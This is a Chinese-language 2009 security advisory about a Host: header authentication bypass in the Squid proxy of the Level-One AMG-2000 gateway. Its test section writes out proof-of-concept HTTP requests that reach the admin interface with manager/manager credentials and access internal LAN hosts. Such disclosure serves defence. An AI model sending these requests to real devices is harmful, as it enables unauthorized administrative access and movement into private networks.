LevelOne AMG-2000内部代理Host:头绕过安全限制漏洞
发布日期:2009-04-29
更新日期:2009-04-30
受影响系统:Level-One AMG-2000 2.00.00 build00600
描述:
BUGTRAQ ID:
34760
AMG-2000是专为中小型网络部署和管理设计的AP管理网关。
AMG-2000使用了一个内部Squid代理限制对无线LAN或Internet的访问,该代理默认运行在2128端口上。如果远程攻击者向代理发送了包含有特制Host:头和Request-URI的HTTP GET请求的话,就可以绕过认证访问管理接口。
<*来源:J. Greil
链接:
http://secunia.com/advisories/34926/
http://marc.info/?l=bugtraq&m=124102938316439&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
a) 从WLAN访问管理界面登录页面:
=================================
GET
http://127.0.0.1/ HTTP/1.1
Host: 192.168.0.1:2128
[...]
=================================
b) 以manager用户权限登录管理界面:
=================================
POST
http://127.0.0.1/check.shtml HTTP/1.1
Host: 192.168.0.1:2128
[...]
username=manager&password=manager&Submit=ENTER
=================================
c) 访问私有LAN端口上配置的其他内部IP地址:
=================================
GET
http://10.0.0.1/ HTTP/1.1
Host: 192.168.0.1:2128
[...]
=================================
建议:
厂商补丁:
Level-One
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://global.level1.com/products2.php?Id=821浏览次数:2432
严重程度:0(网友投票)